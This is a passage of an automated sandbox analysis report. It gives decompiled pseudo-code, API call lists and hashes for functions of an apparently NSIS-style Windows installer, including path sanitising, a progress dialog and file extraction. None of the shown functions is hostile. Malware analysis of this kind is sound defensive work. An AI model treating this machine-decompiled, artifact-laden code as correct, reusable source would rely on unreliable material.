                                                                                                • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                              • String ID: 9
                                                                                              • API String ID: 163830602-2366072709
                                                                                              • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                              • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                              • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                              • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                              0x004068f1
                                                                                              0x004068fa
                                                                                              0x00406911
                                                                                              0x00406911
                                                                                              0x00406918
                                                                                              0x00406924
                                                                                              0x00406924
                                                                                              0x00406927
                                                                                              0x0040692a
                                                                                              0x0040692f
                                                                                              0x00406931
                                                                                              0x0040693a
                                                                                              0x0040693e
                                                                                              0x0040695b
                                                                                              0x00406963
                                                                                              0x00406963
                                                                                              0x00406968
                                                                                              0x0040696a
                                                                                              0x0040696d
                                                                                              0x00406972
                                                                                              0x00406973
                                                                                              0x00406977
                                                                                              0x00406977
                                                                                              0x00406978
                                                                                              0x0040697f
                                                                                              0x00406981
                                                                                              0x00406988
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406990
                                                                                              0x00406996
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406996
                                                                                              0x0040699b

                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                              • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                              • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                              • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-2982765560
                                                                                              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                              • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                              0x0040303d
                                                                                              0x0040303f
                                                                                              0x00403046
                                                                                              0x00403049
                                                                                              0x00403049
                                                                                              0x0040304f
                                                                                              0x00000000
                                                                                              0x0040304f
                                                                                              0x0040305d
                                                                                              0x00000000
                                                                                              0x00403060
                                                                                              0x00403067
                                                                                              0x00403073
                                                                                              0x0040307b
                                                                                              0x004030b9
                                                                                              0x004030c2
                                                                                              0x00000000
                                                                                              0x004030c7
                                                                                              0x00403084
                                                                                              0x00403095
                                                                                              0x00000000
                                                                                              0x004030a3
                                                                                              0x00403084
                                                                                              0x004030cf

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                                              • GetTickCount.KERNEL32 ref: 00403067
                                                                                              • wsprintfW.USER32 ref: 00403095
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • CreateDialogParamW.USER32 ref: 004030B9
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 722711167-2449383134
                                                                                              • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                              • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                              • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                              • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                              0x00404f8d
                                                                                              0x00404f9a
                                                                                              0x00404fa0
                                                                                              0x00404fde
                                                                                              0x00404fde
                                                                                              0x00404fed
                                                                                              0x00404ff4
                                                                                              0x00000000
                                                                                              0x00404ff6
                                                                                              0x00404fa2
                                                                                              0x00404fb1
                                                                                              0x00404fb9
                                                                                              0x00404fbc
                                                                                              0x00404fce
                                                                                              0x00404fd4
                                                                                              0x00404fdb
                                                                                              0x00000000
                                                                                              0x00404fdb
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                              • GetMessagePos.USER32 ref: 00404FA2
                                                                                              • ScreenToClient.USER32 ref: 00404FBC
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                              • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                              0x00402fa3
                                                                                              0x00402fb1
                                                                                              0x00402fb7
                                                                                              0x00402fb7
                                                                                              0x00402fc5
                                                                                              0x00402fc7
                                                                                              0x00402fd3
                                                                                              0x00402fd8
                                                                                              0x00402fda
                                                                                              0x00402fda
                                                                                              0x00402fe5
                                                                                              0x00402ff5
                                                                                              0x00403007
                                                                                              0x00403007
                                                                                              0x0040300f

                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                              • wsprintfW.USER32 ref: 00402FE5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                              • SetDlgItemTextW.USER32 ref: 00403007
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1158693248
                                                                                              • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                              • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                              • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                              • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                              0x00402950
                                                                                              0x00402952
                                                                                              0x00402957
                                                                                              0x0040295c
                                                                                              0x0040295f
                                                                                              0x00402969
                                                                                              0x0040296d
                                                                                              0x0040296d
                                                                                              0x00402973
                                                                                              0x00402980
                                                                                              0x00402988
                                                                                              0x0040298b
                                                                                              0x00402997
                                                                                              0x0040299a
                                                                                              0x004029a0
                                                                                              0x004029ae
                                                                                              0x004029b3
                                                                                              0x004029b7
                                                                                              0x004029ba
                                                                                              0x004029c3
                                                                                              0x004029cf
                                                                                              0x004029d3
                                                                                              0x004029d6
                                                                                              0x004029e0
                                                                                              0x004029ff
                                                                                              0x004029e7
                                                                                              0x004029ec
                                                                                              0x004029f4
                                                                                              0x004029f7
                                                                                              0x004029fc
                                                                                              0x004029fc
                                                                                              0x00402a06
                                                                                              0x00402a06
                                                                                              0x00402a13
                                                                                              0x00402a19
                                                                                              0x00402a1f
                                                                                              0x00402a1f
                                                                                              0x004029b7
                                                                                              0x00402a33
                                                                                              0x00402a35
                                                                                              0x00402a35
                                                                                              0x00402a3f
                                                                                              0x00402a40
                                                                                              0x00402a44
                                                                                              0x00402a48
                                                                                              0x00402a4e
                                                                                              0x00402a4e
                                                                                              0x00402a55
                                                                                              0x004022f1
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                              • GlobalFree.KERNEL32 ref: 00402A06
                                                                                              • GlobalFree.KERNEL32 ref: 00402A19
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                              • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                              • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                              • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                              0x00404e7a
                                                                                              0x00404e7f
                                                                                              0x00404e87
                                                                                              0x00404e88
                                                                                              0x00404e95
                                                                                              0x00404e9d
                                                                                              0x00404e9e
                                                                                              0x00404ea0
                                                                                              0x00404ea2
                                                                                              0x00404ea4
                                                                                              0x00404ea7
                                                                                              0x00404ea7
                                                                                              0x00404eae
                                                                                              0x00404eb4
                                                                                              0x00404eb4
                                                                                              0x00404ebb
                                                                                              0x00404ec2
                                                                                              0x00404ec5
                                                                                              0x00404ec8
                                                                                              0x00404ec8
                                                                                              0x00404ecc
                                                                                              0x00404edc
                                                                                              0x00404ede
                                                                                              0x00404ee1
                                                                                              0x00404e8a
                                                                                              0x00404e8a
                                                                                              0x00404e91
                                                                                              0x00404e91
                                                                                              0x00404ee9
                                                                                              0x00404ef4
                                                                                              0x00404f0a
                                                                                              0x00404f1b
                                                                                              0x00404f37

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                              • wsprintfW.USER32 ref: 00404F1B
                                                                                              • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$H7B
                                                                                              • API String ID: 3540041739-107966168
                                                                                              • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                              • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                              • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
